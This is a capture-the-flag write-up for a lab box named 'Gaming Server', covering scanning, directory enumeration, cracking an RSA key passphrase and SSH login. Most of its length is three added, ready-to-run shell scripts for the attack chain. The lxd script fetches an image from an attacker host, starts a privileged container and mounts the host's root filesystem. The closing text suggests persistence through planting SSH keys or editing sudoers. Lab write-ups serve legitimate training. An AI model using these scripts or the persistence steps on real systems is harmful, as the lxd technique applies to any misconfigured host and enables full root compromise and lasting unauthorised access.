Gaming Server
Reconnaissance
Initial nmap scan to find open ports, using the flag -Pn ("treat all hosts as alive") so that the scan runs even if the host does not answer ping probes.
Detailed Nmap scan:
Command breakdown:
(-sV): Service version detection
(-sC): Run nmap's default script set
(-p): Scan only ports 22 and 80, the ones found by the initial scan
(-oN nmap): Save the output in normal format to a file called nmap
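The two-phase scan described above, written out as a script. This is an added example and not part of the original writeup; it assumes nmap is installed on the attacking machine, and TARGET is a placeholder for the victim's IP address. The open_ports function parses nmap's normal output (-oN) so the ports found in the first pass feed the -p flag of the second.

```shell
#!/bin/sh
# Added example (not part of the original writeup): the two-phase nmap
# workflow as a script. Assumes nmap is installed on the attacking machine;
# TARGET is a placeholder for the victim's IP address.
set -e

# Phase 1: a quick scan to find open ports. -Pn treats the host as alive,
# so the scan runs even when ICMP echo requests are filtered.
quick_scan() {
    target="$1"; out="${2:-nmap_quick}"
    nmap -Pn -oN "$out" "$target"
}

# Read an -oN (normal output) file and return the open TCP ports as a
# comma-separated list, e.g. "22,80", ready for the -p flag of phase 2.
# Port lines look like "22/tcp   open  ssh"; filtered/closed ports are skipped.
open_ports() {
    awk -F/ '/^[0-9]+\/tcp +open/ { printf "%s%s", sep, $1; sep="," }' "$1"
}

# Phase 2: service versions (-sV) and default scripts (-sC) against only the
# ports found, saved in normal format to the file "nmap" as in the writeup.
detailed_scan() {
    target="$1"; ports="$2"; out="${3:-nmap}"
    nmap -Pn -sV -sC -p "$ports" -oN "$out" "$target"
}

main() {
    quick_scan "$1" nmap_quick
    ports=$(open_ports nmap_quick)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found in nmap_quick" >&2
        exit 1
    fi
    echo "open ports: $ports"
    detailed_scan "$1" "$ports" nmap
}

# Usage: sh recon.sh TARGET
if [ "$#" -eq 1 ]; then main "$@"; fi
```

Run it as `sh recon.sh TARGET`; the detailed results land in the file nmap, matching the -oN nmap flag in the breakdown above.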
Enumeration
Let's visit the website.
It is a fully functional website with nothing of interest at first glance, but looking at the page source we find something interesting: a username, John. A username is worth noting, since it is half of a credential pair for services such as SSH. Next, let's run gobuster to find hidden directories and pages.
We find two directories. The secret directory looks like it contains more files, so let's run a gobuster scan against it as well.
Let's now explore these directories.
The uploads directory appears to hold files that have been uploaded to the web server. Let's download the three files we see here.
Let's look at the files. First dict.lst: it looks like a password list, which is worth keeping, since a wordlist left lying on a target is a strong hint about what it is meant to crack. The second file is interesting to read but contains nothing that helps us, and the third file is a meme.
Now let's look at the secret directory. Let's download the file there and read it.
It is an RSA private key, so let's run it through ssh2john to recover its passphrase and then log in over SSH.
Exploitation
Let's use ssh2john to turn the key into a hash that john can crack.
Now let's crack the hash with john; the dict.lst wordlist from the uploads directory is the natural choice.
We found the passphrase, so let's log in over SSH, but first there is one step to take: ssh refuses to use a private key file that other users can read, so the key file's permissions have to be tightened to the owner only.
And now we can log in.
We can now read the user.txt file.
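The exploitation steps above (hash the key, crack it with the wordlist from the server, fix the key permissions, log in) as one script. This is an added example and not the author's own commands. It assumes John the Ripper is installed (ssh2john ships as /usr/share/john/ssh2john.py on Kali, and some packages provide an `ssh2john` wrapper), and that the key file and dict.lst are in the current directory. The key file name id_rsa, the user john and TARGET are placeholders; the page does not name the key file.

```shell
#!/bin/sh
# Added example (not part of the original writeup): cracking the passphrase of
# the downloaded RSA key and logging in with it. Assumes John the Ripper is
# installed (ssh2john is shipped as /usr/share/john/ssh2john.py on Kali and as
# an `ssh2john` wrapper in some packages), and that the key file and the
# dict.lst wordlist from the uploads directory are in the current directory.
# The key file name id_rsa, the user john and TARGET are placeholders.
set -e

# Convert the private key into a hash john understands. This only makes
# sense for a passphrase-protected key; an unencrypted key needs no cracking.
key_to_hash() {
    key="$1"; hash="${2:-key.hash}"
    if command -v ssh2john >/dev/null 2>&1; then
        ssh2john "$key" > "$hash"
    else
        python3 /usr/share/john/ssh2john.py "$key" > "$hash"
    fi
}

# Parse `john --show` output. Its first line is "<keyfile>:<passphrase>",
# followed by a blank line and a summary; keep everything after the first
# colon so a passphrase that itself contains ':' survives intact.
passphrase_from_show() {
    sed -n '1p' | cut -d: -f2-
}

# Run the wordlist attack and print only the recovered passphrase.
crack_hash() {
    hash="$1"; wordlist="$2"
    john --wordlist="$wordlist" "$hash" >/dev/null
    john --show "$hash" | passphrase_from_show
}

# ssh refuses a private key that other users can read ("UNPROTECTED PRIVATE
# KEY FILE!"), so restrict it to the owner. Prints the resulting mode string.
secure_key() {
    chmod 600 "$1"
    ls -ld "$1" | cut -c1-10
}

main() {
    key="$1"; wordlist="$2"; user="$3"; target="$4"
    key_to_hash "$key" key.hash
    echo "passphrase: $(crack_hash key.hash "$wordlist")"
    secure_key "$key" >/dev/null
    ssh -i "$key" "$user@$target"     # enter the passphrase when prompted
}

# Usage: sh crack_and_login.sh id_rsa dict.lst john TARGET
if [ "$#" -eq 4 ]; then main "$@"; fi
```

The chmod step is the one most often forgotten: a key that was just downloaded is typically mode 644, and ssh will ignore it with a permissions warning rather than prompt for the passphrase.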
Privilege Escalation
Let's run the id command, since we cannot check our sudo rights with sudo -l without knowing john's password.
Looking closely we can see that john is a member of the lxd group. LXD is a Linux container manager whose daemon runs as root, and members of the lxd group may talk to that daemon without any further authentication. That is enough to create a privileged container with the host's root filesystem mounted inside it, and a root shell in such a container is effectively root on the host. There is an article on this topic which walks through exactly how to escalate to root with the permissions we currently have; I highly recommend reading it, as it explains the technique very well.
These are the steps we have to follow. First we need to build the Alpine image on our own machine, since the victim machine most likely cannot download files from the internet directly. The image builder can be found here.
Now change into the directory we just cloned and run build-alpine.
After it runs, a tar.gz file is created. We have to transfer it to the victim machine, so let's start an HTTP server on our machine so that the victim can fetch the file with wget.
Now on the victim machine, change into /tmp, where we will keep all temporary files, and download the file.
Now that the image is built and transferred, it can be imported into LXD as an image.
Let's check the list of images to confirm it is there.
Now we use the following commands to escalate our privileges to root: create a privileged container from the image, attach the host's root filesystem to it as a disk device, start it, and open a shell inside it.
Now you are root and can read the root flag, which you can find here.
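The whole lxd escalation, attacker side and victim side, as one script. This is an added example and not the author's or the referenced article's commands. Assumptions the page does not state: the image builder is the saghul/lxd-alpine-builder repository, the attacker serves the tarball with python3 -m http.server on port 8000, ATTACKER_IP is a placeholder, and the image alias "alpine" and container name "privesc" are arbitrary names chosen here. The in_lxd_group check is the precondition from the id step above; everything else requires a live LXD host and is not exercised offline.

```shell
#!/bin/sh
# Added example (not part of the original writeup): the lxd group privilege
# escalation as one script, attacker side and victim side. Assumptions the
# page does not state: the image builder is the saghul/lxd-alpine-builder
# repository, the attacker serves the image with python3 -m http.server on
# port 8000, ATTACKER_IP is a placeholder, and the alias "alpine" and the
# container name "privesc" are arbitrary names chosen here.
set -e

# Precondition check. Takes the output of `id`, e.g.
# "uid=1000(john) gid=1000(john) groups=1000(john),108(lxd)", and succeeds
# only if one of the groups is exactly lxd.
in_lxd_group() {
    printf '%s\n' "$1" | grep -qE '[0-9]+\(lxd\)'
}

# --- attacker machine ------------------------------------------------------
# build-alpine needs root to bootstrap the rootfs; it leaves an
# alpine-v3.*-x86_64-*.tar.gz in the repository directory.
build_alpine_image() {
    git clone https://github.com/saghul/lxd-alpine-builder
    ( cd lxd-alpine-builder && sudo ./build-alpine )
}

# Serve the directory so the victim can wget the tarball.
serve_image() {
    ( cd lxd-alpine-builder && python3 -m http.server 8000 )
}

# --- victim machine (run as john) -----------------------------------------
lxd_privesc() {
    attacker="$1"; image="$2"        # ATTACKER_IP and the exact tarball name
    in_lxd_group "$(id)" || { echo "not in the lxd group, this path will not work" >&2; return 1; }
    cd /tmp
    wget "http://$attacker:8000/$image"
    lxc image import "./$image" --alias alpine
    lxc image list                     # the alias should now be listed
    # A privileged container runs its root as the host's real root (uid 0).
    # If this step fails with "No storage pool found", run `lxd init --auto`
    # first to create a default storage pool, then retry.
    lxc init alpine privesc -c security.privileged=true
    # Expose the host's entire filesystem inside the container at /mnt/root.
    lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
    lxc start privesc
    # A root shell in the container; the host's /root is /mnt/root/root.
    lxc exec privesc -- /bin/sh
}

# Usage on the victim: sh lxd_privesc.sh ATTACKER_IP alpine-v3.x-x86_64-YYYYMMDD_HHMM.tar.gz
if [ "$#" -eq 2 ]; then lxd_privesc "$@"; fi
```

On the attacker run build_alpine_image and then serve_image; on the victim run the script with the attacker's IP and the exact tarball name. Because the container is privileged and the host filesystem is mounted writable, the shell can also drop an SSH key into /mnt/root/root/.ssh or edit /mnt/root/etc/sudoers for a more persistent root than reading the flag.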